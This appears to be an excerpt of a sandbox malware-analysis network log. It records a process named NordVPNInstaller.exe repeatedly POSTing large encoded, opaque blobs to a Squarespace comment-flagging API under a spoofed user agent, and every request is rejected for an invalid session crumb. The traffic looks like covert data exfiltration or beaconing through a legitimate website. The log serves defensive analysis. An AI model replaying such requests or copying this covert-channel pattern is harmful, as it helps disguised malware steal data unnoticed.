2024-09-01 19:56:20 UTC	16306	OUT	Data Raw: 55 50 47 31 59 6c 6d 66 42 4b 46 52 32 64 57 50 63 32 4a 44 77 4c 4d 41 38 36 30 66 58 65 48 55 64 43 30 52 4b 50 41 54 47 55 6f 70 58 42 7a 59 53 4b 55 33 45 50 32 62 76 43 79 41 45 75 77 61 50 55 69 71 6e 62 61 6d 31 62 78 45 69 50 4a 70 53 57 47 33 71 78 57 32 58 77 71 43 4f 6e 25 32 42 52 6b 77 77 57 6f 66 36 34 6e 37 54 45 38 75 41 6b 4e 6d 47 44 59 39 59 42 4d 4c 44 6f 4e 71 48 32 36 50 39 4a 6b 6c 48 47 51 59 57 44 42 53 74 4d 63 4d 32 52 63 33 55 65 41 78 4f 75 42 32 32 71 52 65 65 6e 66 25 32 42 42 4c 73 59 61 4a 52 53 58 51 6c 66 52 4f 25 32 42 4e 55 6d 4c 41 54 78 34 6a 4c 37 63 4b 78 46 33 7a 4b 53 52 43 58 61 46 78 74 6e 4f 78 70 4a 50 78 61 25 32 42 78 4f 34 52 52 53 45 4b 64 6a 55 6e 54 52 35 25 32 42 35 32 64 4e 39 4c 53 47 37 43 68 67 51 Data Ascii: UPG1YlmfBKFR2dWPc2JDwLMA860fXeHUdC0RKPATGUopXBzYSKU3EP2bvCyAEuwaPUiqnbam1bxEiPJpSWG3qxW2XwqCOn%2BRkwwWof64n7TE8uAkNmGDY9YBMLDoNqH26P9JklHGQYWDBStMcM2Rc3UeAxOuB22qReenf%2BBLsYaJRSXQlfRO%2BNUmLATx4jL7cKxF3zKSRCXaFxtnOxpJPxa%2BxO4RRSEKdjUnTR5%2B52dN9LSG7ChgQ
2024-09-01 19:56:21 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:20 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BXZWAXk10tLjZTQ5ZWJiY2IzNDRmNmQ4MmFjZTE1ZjVkYWU5NjJl; Path=/; Secure Set-Cookie: crumb=Be0e1Na51t3kZDI3OTExMWIwMGVjYTAxYTJhYThlMzRlMGRjMDdk; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: vdLFHuZy/UD9dNGW6 Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"Be0e1Na51t3kZDI3OTExMWIwMGVjYTAxYTJhYThlMzRlMGRjMDdk"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49772	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:21 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:21 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:21 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:21 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:21 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:21 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BQDAWlHxGoDSM2NiZjliMThhYWI1M2IxYTU1YWUzZWQwZGE0M2Nk; Path=/; Secure Set-Cookie: crumb=BQljbW5YQ9wkYTc0ZGVmMzIyOGNlZWE1Yzc0M2VlMmU0MTc0MjFl; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: IonQucQ0/0ig7WeiI Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BQljbW5YQ9wkYTc0ZGVmMzIyOGNlZWE1Yzc0M2VlMmU0MTc0MjFl"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49773	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:21 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:21 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:21 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:21 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:21 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:21 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BbQJjuIcvZdyMWNkZTRhMTIwZDI5NTUzNmE3OWVhY2NmNzYwY2Nj; Path=/; Secure Set-Cookie: crumb=BZQkPPIud6ueNTM0NjViZTlkOGRiOTY4NDg5ZTdhMGU4YjU3YmJm; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: WAKYMubk/iecpdzXN Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BZQkPPIud6ueNTM0NjViZTlkOGRiOTY4NDg5ZTdhMGU4YjU3YmJm"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49774	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:22 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:22 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:22 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:22 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:22 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:22 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BW1d7n20kSDaZTkwMjQ0MDBhY2Q1YWU3YjQ4YjAxY2MxYjc0OGFl; Path=/; Secure Set-Cookie: crumb=BZ1us2Usrpx3YWYwYWZlZTU1MTRjNjQyYmJmNDhhYWE0MTVlM2Yy; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: NadOZBIi/7XOtHKiw Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BZ1us2Usrpx3YWYwYWZlZTU1MTRjNjQyYmJmNDhhYWE0MTVlM2Yy"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49775	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:22 UTC	296	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108350 Expect: 100-continue
2024-09-01 19:56:22 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:22 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:22 UTC	16306	OUT	Data Raw: 3d 6e 55 61 46 59 5a 59 4f 2f 51 62 42 4d 70 25 32 42 71 73 50 4d 44 4f 43 31 72 56 48 6d 43 74 36 70 6c 57 73 65 37 33 72 65 51 25 32 42 6a 6a 39 46 48 79 75 62 25 32 42 76 58 39 66 4c 33 64 65 79 56 63 52 72 6f 57 4a 30 32 6c 56 6d 62 4d 51 51 72 30 35 55 7a 79 78 70 53 41 62 72 6a 4a 43 30 5a 77 6f 73 75 4f 66 54 50 62 46 46 39 32 59 77 34 58 64 58 59 31 52 6b 65 41 33 62 62 58 32 52 25 32 42 74 34 69 59 6d 49 6d 75 48 38 67 79 74 34 4f 57 34 49 61 4d 4b 48 76 54 4c 33 30 71 61 53 54 64 37 6c 57 57 6f 71 30 75 37 2f 4a 4e 67 4c 44 47 38 70 25 32 42 65 53 35 55 71 4a 71 37 44 61 54 59 42 73 30 59 4b 52 43 4b 62 78 4d 77 6c 68 75 68 6d 33 56 6e 74 34 79 47 50 74 6a 6c 34 4a 59 44 6f 71 56 37 42 64 51 70 67 45 39 6e 64 77 52 57 25 32 42 44 55 51 77 68 6c Data Ascii: =nUaFYZYO/QbBMp%2BqsPMDOC1rVHmCt6plWse73reQ%2Bjj9FHyub%2BvX9fL3deyVcRroWJ02lVmbMQQr05UzyxpSAbrjJC0ZwosuOfTPbFF92Yw4XdXY1RkeA3bbX2R%2Bt4iYmImuH8gyt4OW4IaMKHvTL30qaSTd7lWWoq0u7/JNgLDG8p%2BeS5UqJq7DaTYBs0YKRCKbxMwlhuhm3Vnt4yGPtjl4JYDoqV7BdQpgE9ndwRW%2BDUQwhl
2024-09-01 19:56:22 UTC	1	OUT	Data Raw: 48 Data Ascii: H
2024-09-01 19:56:22 UTC	16306	OUT	Data Raw: 4a 38 75 54 45 6a 69 35 6e 68 57 45 58 4f 54 4e 74 68 66 67 55 6a 66 42 7a 57 4a 25 32 42 4a 2f 41 32 32 4a 5a 6a 45 53 69 6d 46 65 56 46 4b 54 6b 47 30 34 53 63 67 71 75 31 38 52 77 34 48 56 6a 52 61 52 46 48 70 43 75 4a 33 69 33 45 7a 51 36 42 41 46 50 64 69 62 6c 74 4a 58 4d 64 58 43 62 52 65 63 75 4f 78 6e 6e 67 68 71 70 58 67 47 46 51 49 4c 72 52 78 6c 6b 41 69 43 33 57 7a 36 45 4f 4a 45 35 79 34 71 33 77 4c 53 51 69 35 31 78 75 53 51 59 66 68 41 6e 48 5a 4a 52 45 47 54 41 69 55 47 6b 35 47 78 70 50 41 55 4a 7a 7a 39 71 47 32 66 4c 6b 50 65 62 59 4b 43 47 41 64 42 43 56 25 32 42 2f 35 5a 66 54 67 5a 77 34 30 51 36 4a 2f 4e 56 68 4f 6d 4a 46 42 70 4f 52 73 61 54 77 46 43 6e 6f 78 57 68 61 34 49 4a 4e 6f 2f 64 53 38 54 77 63 36 35 46 6a 54 63 6f 42 70 Data Ascii: J8uTEji5nhWEXOTNthfgUjfBzWJ%2BJ/A22JZjESimFeVFKTkG04Scgqu18Rw4HVjRaRFHpCuJ3i3EzQ6BAFPdibltJXMdXCbRecuOxnnghqpXgGFQILrRxlkAiC3Wz6EOJE5y4q3wLSQi51xuSQYfhAnHZJREGTAiUGk5GxpPAUJzz9qG2fLkPebYKCGAdBCV%2B/5ZfTgZw40Q6J/NVhOmJFBpORsaTwFCnoxWha4IJNo/dS8Twc65FjTcoBp
2024-09-01 19:56:22 UTC	1	OUT	Data Raw: 6c Data Ascii: l
2024-09-01 19:56:22 UTC	16306	OUT	Data Raw: 61 62 61 61 53 50 32 53 67 4e 2f 33 34 5a 33 39 56 42 5a 52 4c 4d 37 4f 6d 32 25 32 42 71 79 73 36 63 67 44 51 72 74 55 38 67 78 32 7a 53 51 4d 77 72 4c 30 37 71 35 62 57 54 4c 43 2f 61 7a 50 4a 5a 4c 76 6b 6a 49 58 74 66 32 71 44 43 79 32 55 59 4c 44 72 4e 77 6e 6f 52 32 37 68 43 72 74 35 61 31 6f 34 71 4e 31 6d 55 35 71 51 74 6b 52 31 41 43 56 46 59 64 6b 76 50 35 5a 38 63 65 50 44 35 46 53 35 51 39 25 32 42 44 6e 65 73 6d 45 4d 78 39 74 4d 42 41 63 67 53 47 53 45 25 32 42 6c 2f 74 67 4c 67 69 53 25 32 42 32 56 67 53 51 4d 5a 38 70 63 71 42 44 66 6b 53 4b 50 61 6e 72 39 4c 48 46 33 41 48 35 31 62 7a 77 73 48 67 78 4a 63 47 62 6f 34 4e 6d 35 78 59 4e 76 49 42 38 4a 43 59 45 48 70 55 77 7a 63 73 74 65 76 4a 2f 37 4d 79 2f 49 67 70 63 67 5a 39 63 6c 56 31 Data Ascii: abaaSP2SgN/34Z39VBZRLM7Om2%2Bqys6cgDQrtU8gx2zSQMwrL07q5bWTLC/azPJZLvkjIXtf2qDCy2UYLDrNwnoR27hCrt5a1o4qN1mU5qQtkR1ACVFYdkvP5Z8cePD5FS5Q9%2BDnesmEMx9tMBAcgSGSE%2Bl/tgLgiS%2B2VgSQMZ8pcqBDfkSKPanr9LHF3AH51bzwsHgxJcGbo4Nm5xYNvIB8JCYEHpUwzcstevJ/7My/IgpcgZ9clV1
2024-09-01 19:56:22 UTC	1	OUT	Data Raw: 39 Data Ascii: 9
2024-09-01 19:56:22 UTC	16306	OUT	Data Raw: 50 41 79 56 6e 73 58 67 45 47 6e 38 74 59 6a 32 68 4b 59 68 77 69 46 39 34 6c 38 69 2f 6d 6e 68 44 39 37 37 74 42 63 74 51 52 6e 45 44 52 43 56 75 77 6c 38 73 6f 7a 4c 54 4a 6a 4a 61 37 37 50 47 6c 4f 79 5a 70 4c 2f 6e 35 4a 63 6b 6f 44 25 32 42 71 51 45 61 45 7a 49 43 77 31 4e 37 7a 4c 34 6b 4c 34 70 64 6d 63 66 45 69 51 6e 61 57 32 4c 4e 67 55 73 78 31 67 2f 79 4c 66 2f 5a 47 39 39 37 6a 5a 57 50 36 44 69 54 56 50 44 44 31 38 4d 79 46 34 42 6d 58 67 35 65 37 41 6e 4f 4e 58 6f 25 32 42 54 77 49 58 4a 43 6a 6b 50 73 63 53 25 32 42 50 49 59 67 4f 37 44 34 5a 55 30 39 47 44 52 4f 76 47 53 53 76 4f 65 79 49 55 34 36 70 57 72 67 66 76 37 6c 57 72 4c 66 32 57 58 74 38 46 63 6a 5a 6d 6c 63 39 4e 61 6b 35 5a 41 70 4c 58 4c 4d 7a 74 39 6b 73 4a 44 4e 77 67 7a 37 Data Ascii: PAyVnsXgEGn8tYj2hKYhwiF94l8i/mnhD977tBctQRnEDRCVuwl8sozLTJjJa77PGlOyZpL/n5JckoD%2BqQEaEzICw1N7zL4kL4pdmcfEiQnaW2LNgUsx1g/yLf/ZG997jZWP6DiTVPDD18MyF4BmXg5e7AnONXo%2BTwIXJCjkPscS%2BPIYgO7D4ZU09GDROvGSSvOeyIU46pWrgfv7lWrLf2WXt8FcjZmlc9Nak5ZApLXLMzt9ksJDNwgz7
2024-09-01 19:56:22 UTC	1	OUT	Data Raw: 64 Data Ascii: d
2024-09-01 19:56:22 UTC	16306	OUT	Data Raw: 55 50 47 31 59 6c 6d 66 42 4b 46 52 32 64 57 50 63 32 4a 44 77 4c 4d 41 38 36 30 66 58 65 48 55 64 43 30 52 4b 50 41 54 47 55 6f 70 58 42 7a 59 53 4b 55 33 45 50 32 62 76 43 79 41 45 75 77 61 50 55 69 71 6e 62 61 6d 31 62 78 45 69 50 4a 70 53 57 47 33 71 78 57 32 58 77 71 43 4f 6e 25 32 42 52 6b 77 77 57 6f 66 36 34 6e 37 54 45 38 75 41 6b 4e 6d 47 44 59 39 59 42 4d 4c 44 6f 4e 71 48 32 36 50 39 4a 6b 6c 48 47 51 59 57 44 42 53 74 4d 63 4d 32 52 63 33 55 65 41 78 4f 75 42 32 32 71 52 65 65 6e 66 25 32 42 42 4c 73 59 61 4a 52 53 58 51 6c 66 52 4f 25 32 42 4e 55 6d 4c 41 54 78 34 6a 4c 37 63 4b 78 46 33 7a 4b 53 52 43 58 61 46 78 74 6e 4f 78 70 4a 50 78 61 25 32 42 78 4f 34 52 52 53 45 4b 64 6a 55 6e 54 52 35 25 32 42 35 32 64 4e 39 4c 53 47 37 43 68 67 51 Data Ascii: UPG1YlmfBKFR2dWPc2JDwLMA860fXeHUdC0RKPATGUopXBzYSKU3EP2bvCyAEuwaPUiqnbam1bxEiPJpSWG3qxW2XwqCOn%2BRkwwWof64n7TE8uAkNmGDY9YBMLDoNqH26P9JklHGQYWDBStMcM2Rc3UeAxOuB22qReenf%2BBLsYaJRSXQlfRO%2BNUmLATx4jL7cKxF3zKSRCXaFxtnOxpJPxa%2BxO4RRSEKdjUnTR5%2B52dN9LSG7ChgQ
2024-09-01 19:56:22 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:22 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BfEON-TGrLDdYzg2YzZiOTc2NDk0MGRjZTI2YzMwZjU0YWUzYjM2; Path=/; Secure Set-Cookie: crumb=BczDjtPqjZK0OGEwYTVkMTk4ZWM4MjE0NjU2N2IyM2U4MzRhMDU4; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: nDuW1dRD/5qbOh2v9 Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BczDjtPqjZK0OGEwYTVkMTk4ZWM4MjE0NjU2N2IyM2U4MzRhMDU4"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49776	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:23 UTC	296	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108350 Expect: 100-continue
2024-09-01 19:56:23 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:23 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:23 UTC	16306	OUT	Data Raw: 3d 6e 55 61 46 59 5a 59 4f 2f 51 62 42 4d 70 25 32 42 71 73 50 4d 44 4f 43 31 72 56 48 6d 43 74 36 70 6c 57 73 65 37 33 72 65 51 25 32 42 6a 6a 39 46 48 79 75 62 25 32 42 76 58 39 66 4c 33 64 65 79 56 63 52 72 6f 57 4a 30 32 6c 56 6d 62 4d 51 51 72 30 35 55 7a 79 78 70 53 41 62 72 6a 4a 43 30 5a 77 6f 73 75 4f 66 54 50 62 46 46 39 32 59 79 67 75 56 71 65 61 35 51 45 30 33 62 62 58 32 52 25 32 42 74 34 69 59 6d 49 6d 75 48 38 67 79 74 34 4f 57 34 49 61 4d 4b 48 76 54 4c 33 30 71 61 53 54 64 37 6c 57 57 6f 71 30 75 37 2f 4a 4e 67 4c 44 47 38 70 25 32 42 65 53 35 55 71 4a 71 37 44 61 54 59 42 73 30 59 4b 52 43 4b 62 78 4d 77 6c 68 75 68 6d 33 56 6e 74 34 79 47 50 74 6a 6c 34 4a 59 44 6f 71 56 37 42 64 51 70 67 45 39 6e 64 77 52 57 25 32 42 44 55 51 77 68 6c Data Ascii: =nUaFYZYO/QbBMp%2BqsPMDOC1rVHmCt6plWse73reQ%2Bjj9FHyub%2BvX9fL3deyVcRroWJ02lVmbMQQr05UzyxpSAbrjJC0ZwosuOfTPbFF92YyguVqea5QE03bbX2R%2Bt4iYmImuH8gyt4OW4IaMKHvTL30qaSTd7lWWoq0u7/JNgLDG8p%2BeS5UqJq7DaTYBs0YKRCKbxMwlhuhm3Vnt4yGPtjl4JYDoqV7BdQpgE9ndwRW%2BDUQwhl
2024-09-01 19:56:23 UTC	1	OUT	Data Raw: 48 Data Ascii: H
2024-09-01 19:56:23 UTC	16306	OUT	Data Raw: 4a 38 75 54 45 6a 69 35 6e 68 57 45 58 4f 54 4e 74 68 66 67 55 6a 66 42 7a 57 4a 25 32 42 4a 2f 41 32 32 4a 5a 6a 45 53 69 6d 46 65 56 46 4b 54 6b 47 30 34 53 63 67 71 75 31 38 52 77 34 48 56 6a 52 61 52 46 48 70 43 75 4a 33 69 33 45 7a 51 36 42 41 46 50 64 69 62 6c 74 4a 58 4d 64 58 43 62 52 65 63 75 4f 78 6e 6e 67 68 71 70 58 67 47 46 51 49 4c 72 52 78 6c 6b 41 69 43 33 57 7a 36 45 4f 4a 45 35 79 34 71 33 77 4c 53 51 69 35 31 78 75 53 51 59 66 68 41 6e 48 5a 4a 52 45 47 54 41 69 55 47 6b 35 47 78 70 50 41 55 4a 7a 7a 39 71 47 32 66 4c 6b 50 65 62 59 4b 43 47 41 64 42 43 56 25 32 42 2f 35 5a 66 54 67 5a 77 34 30 51 36 4a 2f 4e 56 68 4f 6d 4a 46 42 70 4f 52 73 61 54 77 46 43 6e 6f 78 57 68 61 34 49 4a 4e 6f 2f 64 53 38 54 77 63 36 35 46 6a 54 63 6f 42 70 Data Ascii: J8uTEji5nhWEXOTNthfgUjfBzWJ%2BJ/A22JZjESimFeVFKTkG04Scgqu18Rw4HVjRaRFHpCuJ3i3EzQ6BAFPdibltJXMdXCbRecuOxnnghqpXgGFQILrRxlkAiC3Wz6EOJE5y4q3wLSQi51xuSQYfhAnHZJREGTAiUGk5GxpPAUJzz9qG2fLkPebYKCGAdBCV%2B/5ZfTgZw40Q6J/NVhOmJFBpORsaTwFCnoxWha4IJNo/dS8Twc65FjTcoBp
2024-09-01 19:56:23 UTC	1	OUT	Data Raw: 6c Data Ascii: l
2024-09-01 19:56:23 UTC	16306	OUT	Data Raw: 61 62 61 61 53 50 32 53 67 4e 2f 33 34 5a 33 39 56 42 5a 52 4c 4d 37 4f 6d 32 25 32 42 71 79 73 36 63 67 44 51 72 74 55 38 67 78 32 7a 53 51 4d 77 72 4c 30 37 71 35 62 57 54 4c 43 2f 61 7a 50 4a 5a 4c 76 6b 6a 49 58 74 66 32 71 44 43 79 32 55 59 4c 44 72 4e 77 6e 6f 52 32 37 68 43 72 74 35 61 31 6f 34 71 4e 31 6d 55 35 71 51 74 6b 52 31 41 43 56 46 59 64 6b 76 50 35 5a 38 63 65 50 44 35 46 53 35 51 39 25 32 42 44 6e 65 73 6d 45 4d 78 39 74 4d 42 41 63 67 53 47 53 45 25 32 42 6c 2f 74 67 4c 67 69 53 25 32 42 32 56 67 53 51 4d 5a 38 70 63 71 42 44 66 6b 53 4b 50 61 6e 72 39 4c 48 46 33 41 48 35 31 62 7a 77 73 48 67 78 4a 63 47 62 6f 34 4e 6d 35 78 59 4e 76 49 42 38 4a 43 59 45 48 70 55 77 7a 63 73 74 65 76 4a 2f 37 4d 79 2f 49 67 70 63 67 5a 39 63 6c 56 31 Data Ascii: abaaSP2SgN/34Z39VBZRLM7Om2%2Bqys6cgDQrtU8gx2zSQMwrL07q5bWTLC/azPJZLvkjIXtf2qDCy2UYLDrNwnoR27hCrt5a1o4qN1mU5qQtkR1ACVFYdkvP5Z8cePD5FS5Q9%2BDnesmEMx9tMBAcgSGSE%2Bl/tgLgiS%2B2VgSQMZ8pcqBDfkSKPanr9LHF3AH51bzwsHgxJcGbo4Nm5xYNvIB8JCYEHpUwzcstevJ/7My/IgpcgZ9clV1
2024-09-01 19:56:23 UTC	1	OUT	Data Raw: 39 Data Ascii: 9
